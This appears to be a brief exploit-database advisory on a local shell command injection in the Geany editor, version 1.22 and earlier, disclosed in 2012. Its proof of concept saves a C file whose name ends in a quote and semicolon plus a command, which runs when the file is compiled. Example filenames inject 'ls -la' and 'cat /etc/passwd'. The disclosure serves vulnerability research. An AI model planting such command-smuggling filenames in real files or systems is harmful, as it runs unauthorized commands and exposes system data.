Geany <=1.22 Local Code injection Vulnerability



EKU-ID: 2864 CVE: OSVDB-ID:
Author: D4RKCR1PT3R Published: 2012-12-10 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Geany <=1.22 Local Shell Command injection Vulnerability
Since that A.B.C.D = Command that will be injected.
 
POC:
 
Create a C file, any file, click save, the filename you put: xpl.c";A.B.C.D"
 
Now compile the file using Geany (Build-> Compile) (Or the shortcut F8), injected code ready.
 
Examples:
 
xpl.c";ls -la"
xpl.c";cat /etc/passwd"